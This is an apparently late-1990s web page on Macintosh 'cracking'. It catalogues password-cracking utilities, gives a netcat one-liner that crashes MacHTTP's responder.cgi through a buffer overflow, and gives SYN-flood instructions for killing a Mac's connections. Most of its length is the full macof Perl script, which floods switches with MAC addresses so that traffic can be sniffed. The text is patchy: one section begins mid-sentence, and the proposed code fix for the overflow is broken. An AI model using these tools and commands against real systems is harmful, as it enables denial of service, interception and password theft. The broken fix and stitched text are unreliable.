Sign In Sign-Up

Welcome!

Close

Would you like to make this site your homepage? It's fast and easy...

Yes, Please make this my home page!

No Thanks

  Don't show this to me again.

Close

Macintosh

The Macintosh platform is not traditionally known for being a cracking platform. It is far more suited to hacking. Programming for the Mac is every bit as challenging as programming for any other environment. Knowledge of C is generally a requisite. For that reason, hacking on the Mac platform can be fun (and occasionally frustrating). Cracking (with respect to the Internet anyway) on the Mac platform, however, is another matter entirely.

First, early TCP/IP implementations on the Mac platform were primarily client oriented. Many server packages do now exist for the Mac, but until recently, TCP/IP was not what I would call an "integrated" part of the traditional MacOS. Today, the situation is vastly different. The advancement of integrated TCP/IP in the MacOS has grown tremendously.

Apple has taken special steps to ensure that the MacOS TCP/IP support is superb. These efforts have manifested through the development of Open Transport technology. Open Transport is an implementation that provides high-level control at the network level. For example, Open Transport allows multiple, simultaneous TCP/IP connections, the number of which is limited only by memory and processor power. Inherent within the system is automated flow control, which detects the need for fragmentation of IP datagrams. That means when a network segment is encountered that cannot handle large packets, Open Transport automatically reverts to fragmentation.

Open Transport has completely integrated MacOS with both TCP/IP and AppleTalk, making it one of the most flexible networking implementations currently available

Programming on the Mac is a challenge. However, most Macintosh users are not so intensely preoccupied with the inner workings of their operating system as users of UNIX systems or even IBM compatibles. The reason has nothing to do with the level of proficiency of Mac users. It has to do with the design of the MacOS itself. The MacOS was conceived with ease of use in mind. Many tasks that are grueling under other operating systems are only a click away on the modern Macintosh. Take, for example, getting connected to the Internet. Only in the last few years have UNIX systems made this process simple. Prior to that, many different files had to be edited correctly and the user had to have some knowledge of UUCP. In contrast, the Mac user is rarely confronted with special configuration problems that call for tweaking the operating system. Therefore, there are few Mac Internet crackers.

Password Crackers and Related Utilities

The utilities described in the following sections are popular password crackers or related utilities for use on Macintosh. Some are made specifically to attack Mac-oriented files. Others are designed to crack UNIX password files. This is not an exhaustive list, but rather a sample of the more interesting tools freely available on the Internet.

PassFinder

PassFinder is a password cracking utility used to crack the administrator password on FirstClass systems. This is an important utility. The program suite FirstClass is a gateway system, commonly used for serving e-mail, UUCP, and even news (NNTP). In essence, FirstClass (which can be found at http://www.softarc.com/) is a total solution for mail, news, and many other types of TCP/IP-based communication systems. It is a popular system on the MacOS platform. (It even has support for Gopher servers and FTP and can be used to operate a full-fledged BBS.) Because FirstClass servers exist not only on outbound Internet networks, but also on intranets, PassFinder is a critical tool. By cracking the administrator password, a user can seize control of the system's incoming and outgoing electronic communications. (However, this must be done on the local machine. That is, the user must have access to the console of the instant machine. This is not a remote cracking utility.)

FirstClass Thrash!

This is an interesting collection of utilities, primarily designed for the purpose of conducting warfare over (or against) a FirstClass BBS. It has features that could be easily likened to Maohell. These include mailbombing tools, denial-of-service tools, and other, assorted scripts useful in harassment of one's enemies. It's primarily used in warfare.

FMProPeeker

This utility cracks FileMaker Pro files. FileMaker Pro is a database solution from Claris, (http://www.claris.com). While more commonly associated with the Macintosh platform, FileMaker Pro now runs on a variety of systems. It is available for shared database access on Windows NT networks, for example. In any event, FMProPeeker subverts the security of FileMaker Pro files.

FMP Password Viewer Gold 2.0

FMP Password Viewer Gold 2.0 is another utility for cracking FileMaker Pro files.

Password Killer

Password Killer is designed to circumvent the majority of PowerBook security programs.

Killer Cracker

Killer Cracker is a Macintosh port of Killer Cracker, a password cracker formerly run only on DOS and UNIX-based machines. Thankfully, the Mac version is distributed as a binary; that means you do not need a compiler to build it.

MacKrack

MacKrack is a port of Muffet's famous Crack 4.1. It is designed to crack UNIX passwords. It rarely comes with dictionary files, but works quite well. Makes cracking UNIX /etc/passwd files a cinch. (It has support for both 68K and PPC.)

Unserialize Photoshop

Unserialize Photoshop is a standard serial number-killing utility, designed to circumvent serial number protection on Adobe Photoshop. This utility really falls into the traditional cracking category. I don't think that this type of activity does much to shed light on security issues. It is basically a tool to steal software. Therefore, I will refrain from offering any locations here. Adobe is a good company--perhaps the only company ever to get the best of Microsoft. My position on stealing software (though I've stated it before) is this: You want free software? Get FreeBSD or Linux and go GNU.

WordListMaker

WordListMaker is a utility designed to manage dictionary files. This is invaluable if you plan to crack password files of any size, or files on which the users may speak more than one language (forcing you to use not only American English dictionaries, but perhaps others, including British English, Italian, French, German, and so forth). The utility is designed to merge dictionary files, a function that on a UNIX system takes no more than a brief command line but that, on many other platforms, can be a laborious task.

 Remove Passwords

 Remove Passwords is a nifty utility that removes the password protection on Stuffit archives. Stuffit is an archiving utility much like PKZIP or GZIP. It is more commonly seen on the Macintosh platform, but has since been ported to others, including Microsoft Windows. You can acquire Stuffit at ftp://ftp.aladdinsys.com/. Remove Passwords bypasses password protection on any archive created (and password protected) with Stuffit.

 RemoveIt

 RemoveIt is a utility almost identical to Remove Passwords. It strips the passwords from Stuffit archives.

 MacPassword

 The industry standard for full password protection on MacOS, MacPassword is a fully developed commercial application. It provides not only multiple levels of password protection (for both disk and screen), but it also incorporates virus scanning technology. It's definitely worth the money. However, you can always check it out for free.

 Holes in MAC

 Responder.cgi Vulnerability

responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You are at risk if your responder.cgi file contains the line of code:

 char PostArg_Search[256];

 which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested.

 Exploit Example: (nc is netcat from avian.org)

$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80

 Possible Workaround:

Remove responder.cgi from your /cgi-bin/ or change char PostArg_Search[256]; to

char PostArg_Search;

 Killing the Bandwidth

 You can kill all the bandwidth out of MacOS up to 8.* , by finding a open port ( only 1 ) and by using synk command line "synk 0 ip open_port then_the_next_port" . MacOS tcp/ip stack can't handle synfloods and inturn it takes all bandwidth alway from that box.... keep it for 5 mins

or so and all conn's from the box _should_ die ( telnets/ftps/ircs/etc).....

 Due to limitation with ARP/MAC-tables,  switches could start sending packages to all ports, other network devices could hang, crash or reboot  if they receive lots of MAC-addresses.

 Threat:   Someone could eavesdrop/sniff network connections over a switched network.

               Denial of service attacks on a local network.

 Platform: Verified a 3com Superstack Switch 3300 (3c16981 Hardware v.1 Software v.2.10).

               Very possible other network devices.

 Solution: There is no today known solution to the problem.

 Vulnerability Description

Senario:

Computer A talks with computer B.

Computer C is running macof.

Computer A, B and C are connected to the same 3com switch.

 When running macof ( http://quake.skif.net/RawIP/macof.html ), a perl-program included in the perl-module Raw:IP ( http://quake.skif.net/RawIP/ ), through a 3com Superstack Switch 3300 (3c16981 Hardware v.1 Software v.2.10) the switch starts to send all network packages from computer A to computer B and computer C.

 Solution

There is no today known solution to the problem. As a workaround for switches you could maybe, where available, lock a MAC-address to every port on the switch.

 Background:

At DefCon VI there were discussions about switches. Some people acquire a switch because you could not eavesdrop a network connection over it. Someone told that if you send a special multicast to a switch you could spoof another switch and thereby should the switch start sending you network packages. In these attempts we discovered that you easily could spoof a MAC-address and thereby confuse a switch because the switch tries to remember which MAC-addresses is on each port. Because of some network packages goes to the spoofing MAC you get problems with the connections (resends). But what happens if the switch gets flooded with MAC-addresses? The switch just has a bound memory-space for the MAC-addresses on each port. What happens if this table gets full? After a few tests (with macof) we got different results depending on the brand of the switch. Some switches stopped working and other started to forward network traffic to  wrong or all ports. The only scientific analysis is this one reported. This is a resource

problem.

3com was informed about this problem 21/4 1999.

 macof is just one way to do it. We think that the best way to eavesdrop a connection over a switch is to spoof the default router and send ARP-redirects with your MAC-address as ?changing to? and route the incoming packages to the default routers MAC-address.

 //Ian Vitek

ian.vitek@infosec.se

 Test program, macof:

#!/usr/bin/perl -w

#

# macof v. 1.1

# By Ian Vitek ( ian.vitek@infosec.se )

# Tests network devices by flooding local network with MAC-addresses.

#

# Needs Net::RawIP (http://quake.skif.net/RawIP)

# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)

#

# Example: ./macof -e <mac_of_def_gate> -n 1000000

#          ./macof -r -n 1000000

#          (run it several times)

#

# Warning: This program could cause serious problems on your network.

#          This program could hang, crash or reboot network devices.

#          Switches could start sending packages to all ports making it

#          possible to intercept network traffic.

#

#

require 'getopts.pl';

use Net::RawIP;

Getopts('hvrs:e:d:x:y:i:n:');

sub GenMAC

{

  my $tmp_mac="00";

  my $i=0;

# generate random mac-address

  while($i++ < 5) {

    $tmp_mac.=":" . sprintf("%x",int rand 16);

    $tmp_mac.=sprintf("%x",int rand 16);

  }

  return($tmp_mac);

}

$a = new Net::RawIP;

die "usage: $0 [options]\

\t-d dest_host\t\t(def:random)\

\t-s source_host\t\t(def:random)\

\t-v \t\t\tprints generated mac-addresses\

\t-r | -e dest_mac \trandomize or set destination mac address\

\t\t\t\tshould be in format ff:ff:ff:ff:ff:ff or host\

\t-x source_port\t\t(def:random)\

\t-y dest_port \t\t(def:random)\

\t-i interface \t\tset sending interface \t\t(def:eth0)\

\t-n times\t\tset number of times to send \t(def:1)\

\t-h this help\n" unless ( !$opt_h && !($opt_r && $opt_e) );

# set default values

$opt_i=eth0 unless $opt_i;

$opt_n=1 unless $opt_n;

$s_host=$opt_s if $opt_s;

$d_host=$opt_d if $opt_d;

$s_port=$opt_x if $opt_x;

$d_port=$opt_y if $opt_y;

# choose network card

if($opt_e) {

  $a->ethnew($opt_i, dest => $opt_e);

} else {

  $a->ethnew($opt_i);

}

# Loop

for($times=0; $times < $opt_n; $times++) {

# Check if one or two mac-addresses should be generated

  $mac=&GenMAC;

  if($opt_r) {

    $d_mac=&GenMAC;

    print "$d_mac \t$mac\n" if($opt_v);

#   set mac-addresses

    $a->ethset(source => $mac, dest => $d_mac);

  } else {

    print "$mac\n" if($opt_v);

#   set mac-address

    $a->ethset(source => $mac);

  }

# generate random source and destination ip-addresses

  $s_host=17000000+int rand 4261000000 unless $opt_s;

  $d_host=17000000+int rand 4261000000 unless $opt_d;

# generate random source and dest ports

  $s_port=int rand 65535 unless $opt_x;

  $d_port=int rand 65535 unless $opt_y;

# set network package

  $a->set({ip => {saddr => $s_host, daddr => $d_host},

           tcp => {source => $s_port, dest => $d_port}

          });

# send

  $a->ethsend;

}

Apple "Web Sharing" in MacOS 8.5.1

to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it change from "Web Sharing On" to "Web Sharing Off", presumably because the web server task dies.  An annoying DoS, possibly worse, who knows (depends if they compiled with range checking on, what language they used, etc).

Macintosh version of Word '98 includes sensitive material in document files.

Since Word ignores the logical end of file and includes the entire contents of the final disk sector in the file,   other information can be placed in a document file. When this file is sent to other recipients, the hidden data   is sent with it.   This data is not viewable by Word, but any binary editor can view the file and reveal the information in it. Although Microsoft claims only information from the hard drive is placed in the document (a bad thing by   itself!) several reports mention that information from the memory is included as well.

Although the Mac platform is not known for being a cracking platform, it is well suited for hacking. Hacking on the Mac platform can be fun; cracking is another matter entirely. This chapter covers a multitude of utilities for hacking and cracking using the Macintosh platform, and also discusses ways to keep hackers and crackers out.